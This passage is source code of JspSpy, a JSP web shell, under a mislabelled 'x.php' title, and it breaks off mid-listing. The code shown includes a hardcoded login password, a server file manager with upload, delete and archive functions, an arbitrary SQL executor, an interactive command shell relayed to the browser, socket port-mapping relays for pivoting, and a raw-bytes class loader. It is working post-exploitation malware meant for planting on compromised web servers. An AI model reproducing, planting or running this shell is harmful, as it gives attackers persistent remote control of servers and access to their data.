x.php

1. <%@page pageEncoding="utf-8"%>
2. <%@page import="java.io.*"%>
3. <%@page import="java.util.*"%>
4. <%@page import="java.util.regex.*"%>
5. <%@page import="java.sql.*"%>
6. <%@page import="java.lang.reflect.*"%>
7. <%@page import="java.nio.charset.*"%>
8. <%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
9. <%@page import="java.text.*"%>
10. <%@page import="java.net.*"%>
11. <%@page import="java.util.zip.*"%>
12. <%@page import="java.util.jar.*"%>
13. <%@page import="java.awt.*"%>
14. <%@page import="java.awt.image.*"%>
15. <%@page import="javax.imageio.*"%>
16. <%@page import="java.awt.datatransfer.DataFlavor"%>
17. <%@page import="java.util.prefs.Preferences"%>
18. <%!private static final String PW = "apple"; //password
19. private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
20. private static final String REQUEST_CHARSET = "ISO-8859-1";
21. private static final String PAGE_CHARSET = "UTF-8";
22. private static final String CURRENT_DIR = "currentdir";
23. private static final String MSG = "SHOWMSG";
24. private static final String PORT_MAP = "PMSA";
25. private static final String DBO = "DBO";
26. private static final String SHELL_ONLINE = "SHELL_ONLINE";
27. private static final String ENTER = "ENTER_FILE";
28. private static final String ENTER_MSG = "ENTER_FILE_MSG";
29. private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR";
30. private static final String SESSION_O = "SESSION_O";
31. private static String SHELL_NAME = "";
32. private static String WEB_ROOT = null;
33. private static String SHELL_DIR = null;
34. public static Map ins = new HashMap();
35. private static boolean ISLINUX = false;
36.  
37. private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout.";
38. private static final String BACK_HREF = " <a href='javascript:history.back()'>Back</a>";
39.  
40. private static class MyRequest extends HttpServletRequestWrapper {
41. public MyRequest(HttpServletRequest req) {
42. super(req);
43. }
44.  
45. public String getParameter(String name) {
46. try {
47. String value = super.getParameter(name);
48. if (name == null)
49. return null;
50. return new String(value.getBytes(REQUEST_CHARSET), PAGE_CHARSET);
51. } catch (Exception e) {
52. return null;
53. }
54. }
55. }
56.  
57. private static class SpyClassLoader extends ClassLoader {
58. public SpyClassLoader() {
59. }
60.  
61. public Class defineClass(String name, byte[] b) {
62. return super.defineClass(name, b, 0, b.length - 2);
63. }
64. }
65.  
66. private static class DBOperator {
67. private Connection conn = null;
68. private Statement stmt = null;
69. private String driver;
70. private String url;
71. private String uid;
72. private String pwd;
73.  
74. public DBOperator(String driver, String url, String uid, String pwd)
75. throws Exception {
76. this(driver, url, uid, pwd, false);
77. }
78.  
79. public DBOperator(String driver, String url, String uid, String pwd,
80. boolean connect) throws Exception {
81. Class.forName(driver);
82. if (connect)
83. this.conn = DriverManager.getConnection(url, uid, pwd);
84. this.url = url;
85. this.driver = driver;
86. this.uid = uid;
87. this.pwd = pwd;
88. }
89.  
90. public void connect() throws Exception {
91. this.conn = DriverManager.getConnection(url, uid, pwd);
92. }
93.  
94. public Object execute(String sql) throws Exception {
95. if (isValid()) {
96. stmt = conn.createStatement();
97. if (stmt.execute(sql)) {
98. return stmt.getResultSet();
99. } else {
100. return "" + stmt.getUpdateCount();
101. }
102. }
103. throw new Exception("Connection is inValid.");
104. }
105.  
106. public void closeStmt() throws Exception {
107. if (this.stmt != null)
108. stmt.close();
109. }
110.  
111. public boolean isValid() throws Exception {
112. return conn != null && !conn.isClosed();
113. }
114.  
115. public void close() throws Exception {
116. if (isValid()) {
117. closeStmt();
118. conn.close();
119. }
120. }
121.  
122. public boolean equals(Object o) {
123. if (o instanceof DBOperator) {
124. DBOperator dbo = (DBOperator) o;
125. return this.driver.equals(dbo.driver)
126. && this.url.equals(dbo.url) && this.uid.equals(dbo.uid)
127. && this.pwd.equals(dbo.pwd);
128. }
129. return false;
130. }
131.  
132. public Connection getConn() {
133. return this.conn;
134. }
135. }
136.  
137. private static class StreamConnector extends Thread {
138. private InputStream is;
139. private OutputStream os;
140.  
141. public StreamConnector(InputStream is, OutputStream os) {
142. this.is = is;
143. this.os = os;
144. }
145.  
146. public void run() {
147. BufferedReader in = null;
148. BufferedWriter out = null;
149. try {
150. in = new BufferedReader(new InputStreamReader(this.is));
151. out = new BufferedWriter(new OutputStreamWriter(this.os));
152. char buffer[] = new char[8192];
153. int length;
154. while ((length = in.read(buffer, 0, buffer.length)) > 0) {
155. out.write(buffer, 0, length);
156. out.flush();
157. }
158. } catch (Exception e) {
159. }
160. try {
161. if (in != null)
162. in.close();
163. if (out != null)
164. out.close();
165. } catch (Exception e) {
166. }
167. }
168.  
169. public static void readFromLocal(final DataInputStream localIn,
170. final DataOutputStream remoteOut) {
171. new Thread(new Runnable() {
172. public void run() {
173. while (true) {
174. try {
175. byte[] data = new byte[100];
176. int len = localIn.read(data);
177. while (len != -1) {
178. remoteOut.write(data, 0, len);
179. len = localIn.read(data);
180. }
181. } catch (Exception e) {
182. break;
183. }
184. }
185. }
186. }).start();
187. }
188.  
189. public static void readFromRemote(final Socket soc,
190. final Socket remoteSoc, final DataInputStream remoteIn,
191. final DataOutputStream localOut) {
192. new Thread(new Runnable() {
193. public void run() {
194. while (true) {
195. try {
196. byte[] data = new byte[100];
197. int len = remoteIn.read(data);
198. while (len != -1) {
199. localOut.write(data, 0, len);
200. len = remoteIn.read(data);
201. }
202. } catch (Exception e) {
203. try {
204. soc.close();
205. remoteSoc.close();
206. } catch (Exception ex) {
207. }
208. break;
209. }
210. }
211. }
212. }).start();
213. }
214. }
215.  
216. private static class EnterFile extends File {
217. private ZipFile zf = null;
218. private ZipEntry entry = null;
219. private boolean isDirectory = false;
220. private String absolutePath = null;
221.  
222. public void setEntry(ZipEntry e) {
223. this.entry = e;
224. }
225.  
226. public void setAbsolutePath(String p) {
227. this.absolutePath = p;
228. }
229.  
230. public void close() throws Exception {
231. this.zf.close();
232. }
233.  
234. public void setZf(String p) throws Exception {
235. if (p.toLowerCase().endsWith(".jar"))
236. this.zf = new JarFile(p);
237. else
238. this.zf = new ZipFile(p);
239. }
240.  
241. public EnterFile(File parent, String child) {
242. super(parent, child);
243. }
244.  
245. public EnterFile(String pathname) {
246. super(pathname);
247. }
248.  
249. public EnterFile(String pathname, boolean isDir) {
250. this(pathname);
251. this.isDirectory = isDir;
252. }
253.  
254. public EnterFile(String parent, String child) {
255. super(parent, child);
256. }
257.  
258. public EnterFile(URI uri) {
259. super(uri);
260. }
261.  
262. public boolean exists() {
263. return new File(this.zf.getName()).exists();
264. }
265.  
266. public File[] listFiles() {
267. java.util.List list = new ArrayList();
268. java.util.List handled = new ArrayList();
269. String currentDir = super.getPath();
270. currentDir = currentDir.replace('\\', '/');
271. if (currentDir.indexOf("/") == 0) {
272. if (currentDir.length() > 1)
273. currentDir = currentDir.substring(1);
274. else
275. currentDir = "";
276. }
277. Enumeration e = this.zf.entries();
278. while (e.hasMoreElements()) {
279. ZipEntry entry = (ZipEntry) e.nextElement();
280. String eName = entry.getName();
281. if (this.zf instanceof JarFile) {
282. if (!entry.isDirectory()) {
283. EnterFile ef = new EnterFile(eName);
284. ef.setEntry(entry);
285. try {
286. ef.setZf(this.zf.getName());
287. } catch (Exception ex) {
288. }
289. list.add(ef);
290. }
291. } else {
292. if (currentDir.equals("")) {
293. //zip root directory
294. if (eName.indexOf("/") == -1
295. || eName.matches("[^/]+/$")) {
296. EnterFile ef = new EnterFile(eName.replaceAll("/",
297. ""));
298. handled.add(eName.replaceAll("/", ""));
299. ef.setEntry(entry);
300. list.add(ef);
301. } else {
302. if (eName.indexOf("/") != -1) {
303. String tmp = eName.substring(0, eName
304. .indexOf("/"));
305. if (!handled.contains(tmp)
306. && !Util.isEmpty(tmp)) {
307. EnterFile ef = new EnterFile(tmp, true);
308. ef.setEntry(entry);
309. list.add(ef);
310. handled.add(tmp);
311. }
312. }
313. }
314. } else {
315. if (eName.startsWith(currentDir)) {
316. if (eName.matches(currentDir + "/[^/]+/?$")) {
317. //file.
318. EnterFile ef = new EnterFile(eName);
319. ef.setEntry(entry);
320. list.add(ef);
321. if (eName.endsWith("/")) {
322. String tmp = eName.substring(eName
323. .lastIndexOf('/',
324. eName.length() - 2));
325. tmp = tmp.substring(1, tmp.length() - 1);
326. handled.add(tmp);
327. }
328. } else {
329. //dir
330. try {
331. String tmp = eName.substring(currentDir
332. .length() + 1);
333. tmp = tmp.substring(0, tmp.indexOf('/'));
334. if (!handled.contains(tmp)
335. && !Util.isEmpty(tmp)) {
336. EnterFile ef = new EnterFile(tmp, true);
337. ef.setAbsolutePath(currentDir + "/"
338. + tmp);
339. ef.setEntry(entry);
340. list.add(ef);
341. handled.add(tmp);
342. }
343. } catch (Exception ex) {
344. }
345. }
346. }
347. }
348. }
349. }
350. return (File[]) list.toArray(new File[0]);
351. }
352.  
353. public boolean isDirectory() {
354. return this.entry.isDirectory() || this.isDirectory;
355. }
356.  
357. public String getParent() {
358. return "";
359. }
360.  
361. public String getAbsolutePath() {
362. return absolutePath != null ? absolutePath : super.getPath();
363. }
364.  
365. public String getName() {
366. if (this.zf instanceof JarFile) {
367. return this.getAbsolutePath();
368. } else {
369. return super.getName();
370. }
371. }
372.  
373. public long lastModified() {
374. return entry.getTime();
375. }
376.  
377. public boolean canRead() {
378. return false;
379. }
380.  
381. public boolean canWrite() {
382. return false;
383. }
384.  
385. public boolean canExecute() {
386. return false;
387. }
388.  
389. public long length() {
390. return entry.getSize();
391. }
392. }
393.  
394. private static class OnLineProcess {
395. private String cmd = "first";
396. private Process pro;
397.  
398. public OnLineProcess(Process p) {
399. this.pro = p;
400. }
401.  
402. public void setPro(Process p) {
403. this.pro = p;
404. }
405.  
406. public void setCmd(String c) {
407. this.cmd = c;
408. }
409.  
410. public String getCmd() {
411. return this.cmd;
412. }
413.  
414. public Process getPro() {
415. return this.pro;
416. }
417.  
418. public void stop() {
419. this.pro.destroy();
420. }
421. }
422.  
423. private static class OnLineConnector extends Thread {
424. private OnLineProcess ol = null;
425. private InputStream is;
426. private OutputStream os;
427. private String name;
428.  
429. public OnLineConnector(InputStream is, OutputStream os, String name,
430. OnLineProcess ol) {
431. this.is = is;
432. this.os = os;
433. this.name = name;
434. this.ol = ol;
435. }
436.  
437. public void run() {
438. BufferedReader in = null;
439. BufferedWriter out = null;
440. try {
441. in = new BufferedReader(new InputStreamReader(this.is));
442. out = new BufferedWriter(new OutputStreamWriter(this.os));
443. char buffer[] = new char[128];
444. if (this.name.equals("exeRclientO")) {
445. //from exe to client
446. int length = 0;
447. while ((length = in.read(buffer, 0, buffer.length)) > 0) {
448. String str = new String(buffer, 0, length);
449. str = str.replaceAll("&", "&amp;").replaceAll("<",
450. "&lt;").replaceAll(">", "&gt;");
451. str = str.replaceAll("" + (char) 13 + (char) 10,
452. "<br/>");
453. str = str.replaceAll("\n", "<br/>");
454. out.write(str.toCharArray(), 0, str.length());
455. out.flush();
456. }
457. } else {
458. //from client to exe
459. while (true) {
460. while (this.ol.getCmd() == null) {
461. Thread.sleep(500);
462. }
463. if (this.ol.getCmd().equals("first")) {
464. this.ol.setCmd(null);
465. continue;
466. }
467. this.ol.setCmd(this.ol.getCmd() + (char) 10);
468. char[] arr = this.ol.getCmd().toCharArray();
469. out.write(arr, 0, arr.length);
470. out.flush();
471. this.ol.setCmd(null);
472. }
473. }
474. } catch (Exception e) {
475. }
476. try {
477. if (in != null)
478. in.close();
479. if (out != null)
480. out.close();
481. } catch (Exception e) {
482. }
483. }
484. }
485.  
486. private static class Table {
487. private ArrayList rows = null;
488. private boolean echoTableTag = false;
489.  
490. public void setEchoTableTag(boolean v) {
491. this.echoTableTag = v;
492. }
493.  
494. public Table() {
495. this.rows = new ArrayList();
496. }
497.  
498. public void addRow(Row r) {
499. this.rows.add(r);
500. }
501.  
502. public String toString() {
503. StringBuffer html = new StringBuffer();
504. if (echoTableTag)
505. html.append("<table>");
506. for (int i = 0; i < rows.size(); i++) {
507. Row r = (Row) rows.get(i);
508. html
509. .append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
510. ArrayList columns = r.getColumns();
511. for (int a = 0; a < columns.size(); a++) {
512. Column c = (Column) columns.get(a);
513. html.append("<td nowrap>");
514. String vv = Util.htmlEncode(Util.getStr(c.getValue()));
515. if (vv.equals(""))
516. vv = "&nbsp;";
517. html.append(vv);
518. html.append("</td>");
519. }
520. html.append("</tr>");
521. }
522. if (echoTableTag)
523. html.append("</table>");
524. return html.toString();
525. }
526.  
527. public static String rs2Table(ResultSet rs, String sep, boolean op)
528. throws Exception {
529. StringBuffer table = new StringBuffer();
530. ResultSetMetaData meta = rs.getMetaData();
531. int count = meta.getColumnCount();
532. if (!op)
533. table
534. .append("<b style='color:red;margin-left:15px'><i> View Struct </i></b> - <a href=\"javascript:doPost({o:'executesql'})\">View All Tables</a><br/><br/>");
535. else
536. table
537. .append("<b style='color:red;margin-left:15px'><i> All Tables </i></b><br/><br/>");
538. table
539. .append("<script>function view(t){document.getElementById('sql').value='select * from "
540. + sep + "'+t+'" + sep + "';}</script>");
541. table
542. .append("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
543. for (int i = 1; i <= count; i++) {
544. table.append("<td nowrap>" + meta.getColumnName(i) + "</td>");
545. }
546. if (op)
547. table.append("<td>&nbsp;</td>");
548. table.append("</tr>");
549. while (rs.next()) {
550. String tbName = null;
551. table
552. .append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
553. for (int i = 1; i <= count; i++) {
554. String v = rs.getString(i);
555. if (i == 3)
556. tbName = v;
557. table.append("<td nowrap>" + Util.null2Nbsp(v) + "</td>");
558. }
559. if (op)
560. table
561. .append("<td nowrap> <a href=\"#\" onclick=\"view('"
562. + tbName
563. + "')\">View</a> | <a href=\"javascript:doPost({o:'executesql',type:'struct',table:'"
564. + tbName
565. + "'})\">Struct</a> | <a href=\"javascript:doPost({o:'export',table:'"
566. + tbName
567. + "'})\">Export </a> | <a href=\"javascript:doPost({o:'vExport',table:'"
568. + tbName + "'})\">Save To File</a> </td>");
569. table.append("</tr>");
570. }
571. table.append("</table><br/>");
572. return table.toString();
573. }
574. }
575.  
576. private static class Row {
577. private ArrayList cols = null;
578.  
579. public Row() {
580. this.cols = new ArrayList();
581. }
582.  
583. public void addColumn(Column n) {
584. this.cols.add(n);
585. }
586.  
587. public ArrayList getColumns() {
588. return this.cols;
589. }
590. }
591.  
592. private static class Column {
593. private String value;
594.  
595. public Column(String v) {
596. this.value = v;
597. }
598.  
599. public String getValue() {
600. return this.value;
601. }
602. }
603.  
604. private static class Util {
605. public static boolean isEmpty(String s) {
606. return s == null || s.trim().equals("");
607. }
608.  
609. public static boolean isEmpty(Object o) {
610. return o == null || isEmpty(o.toString());
611. }
612.  
613. public static String getSize(long size, char danwei) {
614. if (danwei == 'M') {
615. double v = formatNumber(size / 1024.0 / 1024.0, 2);
616. if (v > 1024) {
617. return getSize(size, 'G');
618. } else {
619. return v + "M";
620. }
621. } else if (danwei == 'G') {
622. return formatNumber(size / 1024.0 / 1024.0 / 1024.0, 2) + "G";
623. } else if (danwei == 'K') {
624. double v = formatNumber(size / 1024.0, 2);
625. if (v > 1024) {
626. return getSize(size, 'M');
627. } else {
628. return v + "K";
629. }
630. } else if (danwei == 'B') {
631. if (size > 1024) {
632. return getSize(size, 'K');
633. } else {
634. return size + "B";
635. }
636. }
637. return "" + 0 + danwei;
638. }
639.  
640. public static boolean exists(String[] arr, String v) {
641. for (int i = 0; i < arr.length; i++) {
642. if (v.equals(arr[i])) {
643. return true;
644. }
645. }
646. return false;
647. }
648.  
649. public static double formatNumber(double value, int l) {
650. NumberFormat format = NumberFormat.getInstance();
651. format.setMaximumFractionDigits(l);
652. format.setGroupingUsed(false);
653. return new Double(format.format(value)).doubleValue();
654. }
655.  
656. public static boolean isInteger(String v) {
657. if (isEmpty(v))
658. return false;
659. return v.matches("^\\d+$");
660. }
661.  
662. public static String formatDate(long time) {
663. SimpleDateFormat format = new SimpleDateFormat(
664. "yyyy-MM-dd hh:mm:ss");
665. return format.format(new java.util.Date(time));
666. }
667.  
668. public static String convertPath(String path) {
669. return path != null ? path.replace('\\', '/') : "";
670. }
671.  
672. public static String htmlEncode(String v) {
673. if (isEmpty(v))
674. return "";
675. return v.replaceAll("&", "&amp;").replaceAll("<", "&lt;")
676. .replaceAll(">", "&gt;");
677. }
678.  
679. public static String getStr(String s) {
680. return s == null ? "" : s;
681. }
682.  
683. public static String null2Nbsp(String s) {
684. if (s == null)
685. s = "&nbsp;";
686. return s;
687. }
688.  
689. public static String getStr(Object s) {
690. return s == null ? "" : s.toString();
691. }
692.  
693. public static String exec(String regex, String str, int group) {
694. Pattern pat = Pattern.compile(regex);
695. Matcher m = pat.matcher(str);
696. if (m.find())
697. return m.group(group);
698. return null;
699. }
700.  
701. public static void outMsg(Writer out, String msg) throws Exception {
702. outMsg(out, msg, "center");
703. }
704.  
705. public static void outMsg(Writer out, String msg, String align)
706. throws Exception {
707. out
708. .write("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:"
709. + align
710. + ";font-weight:bold;margin:10px\">"
711. + msg
712. + "</div>");
713. }
714.  
715. public static String highLight(String str) {
716. str = str
717. .replaceAll(
718. "\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b",
719. "<span style='color:blue'>$1</span>");
720. str = str.replaceAll("\t(//.+)",
721. "\t<span style='color:green'>$1</span>");
722. return str;
723. }
724. }
725.  
726. private static class UploadBean {
727. private String fileName = null;
728. private String suffix = null;
729. private String savePath = "";
730. private ServletInputStream sis = null;
731. private OutputStream targetOutput = null;
732. private byte[] b = new byte[1024];
733.  
734. public void setTargetOutput(OutputStream stream) {
735. this.targetOutput = stream;
736. }
737.  
738. public UploadBean() {
739. }
740.  
741. public void setSavePath(String path) {
742. this.savePath = path;
743. }
744.  
745. public String getFileName() {
746. return this.fileName;
747. }
748.  
749. public void parseRequest(HttpServletRequest request) throws IOException {
750. sis = request.getInputStream();
751. int a = 0;
752. int k = 0;
753. String s = "";
754. while ((a = sis.readLine(b, 0, b.length)) != -1) {
755. s = new String(b, 0, a, PAGE_CHARSET);
756. if ((k = s.indexOf("filename=\"")) != -1) {
757. s = s.substring(k + 10);
758. k = s.indexOf("\"");
759. s = s.substring(0, k);
760. File tF = new File(s);
761. if (tF.isAbsolute()) {
762. fileName = tF.getName();
763. } else {
764. fileName = s;
765. }
766. k = s.lastIndexOf(".");
767. suffix = s.substring(k + 1);
768. upload();
769. }
770. }
771. }
772.  
773. private void upload() throws IOException {
774. try {
775. OutputStream out = null;
776. if (this.targetOutput != null)
777. out = this.targetOutput;
778. else
779. out = new FileOutputStream(new File(savePath, fileName));
780. int a = 0;
781. int k = 0;
782. String s = "";
783. while ((a = sis.readLine(b, 0, b.length)) != -1) {
784. s = new String(b, 0, a);
785. if ((k = s.indexOf("Content-Type:")) != -1) {
786. break;
787. }
788. }
789. sis.readLine(b, 0, b.length);
790. while ((a = sis.readLine(b, 0, b.length)) != -1) {
791. s = new String(b, 0, a);
792. if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45)
793. && (b[3] == 45) && (b[4] == 45)) {
794. break;
795. }
796. out.write(b, 0, a);
797. }
798. if (out instanceof FileOutputStream)
799. out.close();
800. } catch (IOException ioe) {
801. throw ioe;
802. }
803. }
804. }%>
805. <%
806.  
807. SHELL_NAME = request.getServletPath().substring(
808. request.getServletPath().lastIndexOf("/") + 1);
809. String myAbsolutePath = application.getRealPath(request
810. .getServletPath());
811. if (Util.isEmpty(myAbsolutePath)) {//for weblogic
812. SHELL_NAME = request.getServletPath();
813. myAbsolutePath = new File(application.getResource("/")
814. .getPath()
815. + SHELL_NAME).toString();
816. SHELL_NAME = request.getContextPath() + SHELL_NAME;
817. WEB_ROOT = new File(application.getResource("/").getPath())
818. .toString();
819. } else {
820. WEB_ROOT = application.getRealPath("/");
821. }
822. SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,
823. myAbsolutePath.lastIndexOf(File.separator)));
824. if (SHELL_DIR.indexOf('/') == 0)
825. ISLINUX = true;
826. else
827. ISLINUX = false;
828. if (session.getAttribute(CURRENT_DIR) == null)
829. session.setAttribute(CURRENT_DIR, Util.convertPath(SHELL_DIR));
830. //request = new MyRequest(request);
831. if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null
832. || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
833. String o = request.getParameter("o");
834. if(o != null)
835. o = new String(o.getBytes(REQUEST_CHARSET), PAGE_CHARSET);
836. if (o != null && o.equals("login")) {
837. ((Invoker) ins.get("login")).invoke(request, response,
838. session);
839. return;
840. } else if (o != null && o.equals("vLogin")) {
841. ((Invoker) ins.get("vLogin")).invoke(request, response,
842. session);
843. return;
844. } else {
845. ((Invoker) ins.get("vLogin")).invoke(request, response,
846. session);
847. return;
848. }
849. }
850. %>
851. <%!private static interface Invoker {
852. public void invoke(HttpServletRequest request,
853. HttpServletResponse response, HttpSession JSession)
854. throws Exception;
855.  
856. public boolean doBefore();
857.  
858. public boolean doAfter();
859. }
860.  
861. private static class DefaultInvoker implements Invoker {
862. public void invoke(HttpServletRequest request,
863. HttpServletResponse response, HttpSession JSession)
864. throws Exception {
865. }
866.  
867. public boolean doBefore() {
868. return true;
869. }
870.  
871. public boolean doAfter() {
872. return true;
873. }
874. }
875.  
876. private static class ScriptInvoker extends DefaultInvoker {
877. public void invoke(HttpServletRequest request,
878. HttpServletResponse response, HttpSession JSession)
879. throws Exception {
880. try {
881. PrintWriter out = response.getWriter();
882. out
883. .println("<script type=\"text/javascript\">"
884. + " String.prototype.trim = function(){return this.replace(/^\\s+|\\s+$/,'');};"
885. + " function fso(obj) {"
886. + " this.currentDir = '"
887. + JSession.getAttribute(CURRENT_DIR)
888. + "';"
889. + " this.filename = obj.filename;"
890. + " this.path = obj.path;"
891. + " this.filetype = obj.filetype;"
892. + " this.charset = obj.charset;"
893. + " };"
894. + " fso.prototype = {"
895. + " copy:function(){"
896. + " var path = prompt('Copy To : ',this.path);"
897. + " if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"
898. + " doPost({o:'copy',src:this.path,to:path});"
899. + " },"
900. + " move:function() {"
901. + " var path =prompt('Move To : ',this.path);"
902. + " if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"
903. + " doPost({o:'move',src:this.path,to:path})"
904. + " },"
905. + " vEdit:function() {"
906. + " if (!this.charset)"
907. + " doPost({o:'vEdit',filepath:this.path});"
908. + " else"
909. + " doPost({o:'vEdit',filepath:this.path,charset:this.charset});"
910. + " },"
911. + " down:function() {"
912. + " doPost({o:'down',path:this.path})"
913. + " },"
914. + " removedir:function() {"
915. + " if (!confirm('Dangerous ! Are You Sure To Delete '+this.filename+'?'))return;"
916. + " doPost({o:'removedir',dir:this.path});"
917. + " },"
918. + " mkdir:function() {"
919. + " var name = prompt('Input New Directory Name','');"
920. + " if (name == null || name.trim().length == 0)return;"
921. + " doPost({o:'mkdir',name:name});"
922. + " },"
923. + " subdir:function(out) {"
924. + " doPost({o:'filelist',folder:this.path,outentry:(out || 'none')})"
925. + " },"
926. + " parent:function() {"
927. + " var parent=(this.path.substr(0,this.path.lastIndexOf(\"/\")))+'/';"
928. + " doPost({o:'filelist',folder:parent})"
929. + " },"
930. + " createFile:function() {"
931. + " var path = prompt('Input New File Name','');"
932. + " if (path == null || path.trim().length == 0) return;"
933. + " doPost({o:'vCreateFile',filepath:path})"
934. + " },"
935. + " deleteBatch:function() {"
936. + " if (!confirm('Are You Sure To Delete These Files?')) return;"
937. + " var selected = new Array();"
938. + " var inputs = document.getElementsByTagName('input');"
939. + " for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"
940. + " if (selected.length == 0) {alert('No File Selected');return;}"
941. + " doPost({o:'deleteBatch',files:selected.join(',')})"
942. + " },"
943. + " packBatch:function() {"
944. + " var selected = new Array();"
945. + " var inputs = document.getElementsByTagName('input');"
946. + " for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"
947. + " if (selected.length == 0) {alert('No File Selected');return;}"
948. + " var savefilename = prompt('Input Target File Name(Only Support ZIP)','pack.zip');"
949. + " if (savefilename == null || savefilename.trim().length == 0)return;"
950. + " doPost({o:'packBatch',files:selected.join(','),savefilename:savefilename})"
951. + " },"
952. + " pack:function(showconfig) {"
953. + " if (showconfig && confirm('Need Pack Configuration?')) {doPost({o:'vPack',packedfile:this.path});return;}"
954. + " var tmpName = '';"
955. + " if (this.filename.indexOf('.') == -1) tmpName = this.filename;"
956. + " else tmpName = this.filename.substr(0,this.filename.lastIndexOf('.'));"
957. + " tmpName += '.zip';"
958. + " var path = this.path;"
959. + " var name = prompt('Input Target File Name (Only Support Zip)',tmpName);"
960. + " if (name == null || path.trim().length == 0) return;"
961. + " doPost({o:'pack',packedfile:path,savefilename:name})"
962. + " },"
963. + " vEditProperty:function() {"
964. + " var path = this.path;"
965. + " doPost({o:'vEditProperty',filepath:path})"
966. + " },"
967. + " unpack:function() {"
968. + " var path = prompt('unpack to : ',this.currentDir+'/'+this.filename.substr(0,this.filename.lastIndexOf('.')));"
969. + " if (path == null || path.trim().length == 0) return;"
970. + " doPost({o:'unpack',savepath:path,zipfile:this.path})"
971. + " },"
972. + " enter:function() {"
973. + " doPost({o:'enter',filepath:this.path})"
974. + " }"
975. + " };"
976. + " function doPost(obj) {"
977. + " var form = document.forms[\"doForm\"];"
978. + " var elements = form.elements;for (var i = form.length - 1;i>=0;i--){form.removeChild(elements[i])}"
979. + " for (var pro in obj)"
980. + " {"
981. + " var input = document.createElement(\"input\");"
982. + " input.type = \"hidden\";"
983. + " input.name = pro;"
984. + " input.value = obj[pro];"
985. + " form.appendChild(input);"
986. + " }"
987. + " form.submit();" + " }" + "</script>");
988.  
989. } catch (Exception e) {
990.  
991. throw e;
992. }
993. }
994. }
995.  
996. private static class BeforeInvoker extends DefaultInvoker {
997. public void invoke(HttpServletRequest request,
998. HttpServletResponse response, HttpSession JSession)
999. throws Exception {
1000. try {
1001. PrintWriter out = response.getWriter();
1002. out
1003. .println("<html><head><title>JspSpy</title><style type=\"text/css\">"
1004. + "body,td{font: 12px Arial,Tahoma;line-height: 16px;}"
1005. + ".input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}"
1006. + ".area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}"
1007. + ".bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}"
1008. + "a {color: #00f;text-decoration:underline;}"
1009. + "a:hover{color: #f00;text-decoration:none;}"
1010. + ".alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}"
1011. + ".alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}"
1012. + ".focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}"
1013. + ".head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}"
1014. + ".head td span{font-weight:normal;}"
1015. + "form{margin:0;padding:0;}"
1016. + "h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}"
1017. + "ul.info li{margin:0;color:#444;line-height:24px;height:24px;}"
1018. + "u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}"
1019. + ".secho{height:400px;width:100%;overflow:auto;border:none}"
1020. + "hr{border: 1px solid rgb(221, 221, 221); height: 0px;}"
1021. + "</style></head><body style=\"margin:0;table-layout:fixed; word-break:break-all\">");
1022. } catch (Exception e) {
1023.  
1024. throw e;
1025. }
1026. }
1027. }
1028.  
1029. private static class AfterInvoker extends DefaultInvoker {
1030. public void invoke(HttpServletRequest request,
1031. HttpServletResponse response, HttpSession JSession)
1032. throws Exception {
1033. try {
1034. PrintWriter out = response.getWriter();
1035. out.println("</body></html>");
1036. } catch (Exception e) {
1037.  
1038. throw e;
1039. }
1040. }
1041. }
1042.  
1043. private static class DeleteBatchInvoker extends DefaultInvoker {
1044. public boolean doBefore() {
1045. return false;
1046. }
1047.  
1048. public boolean doAfter() {
1049. return false;
1050. }
1051.  
1052. public void invoke(HttpServletRequest request,
1053. HttpServletResponse response, HttpSession JSession)
1054. throws Exception {
1055. try {
1056. String files = request.getParameter("files");
1057. int success = 0;
1058. int failed = 0;
1059. if (!Util.isEmpty(files)) {
1060. String currentDir = JSession.getAttribute(CURRENT_DIR)
1061. .toString();
1062. String[] arr = files.split(",");
1063. for (int i = 0; i < arr.length; i++) {
1064. String fs = arr[i];
1065. File f = new File(currentDir, fs);
1066. if (f.delete())
1067. success += 1;
1068. else
1069. failed += 1;
1070. }
1071. }
1072. JSession
1073. .setAttribute(
1074. MSG,
1075. success
1076. + " Files Deleted <span style='color:green'>Success</span> , "
1077. + failed
1078. + " Files Deleted <span style='color:red'>Failed</span>!");
1079. response.sendRedirect(SHELL_NAME);
1080. } catch (Exception e) {
1081.  
1082. throw e;
1083. }
1084. }
1085. }
1086.  
1087. private static class ClipBoardInvoker extends DefaultInvoker {
1088. public void invoke(HttpServletRequest request,
1089. HttpServletResponse response, HttpSession JSession)
1090. throws Exception {
1091. try {
1092. PrintWriter out = response.getWriter();
1093. out
1094. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
1095. + " <tr>"
1096. + " <td>"
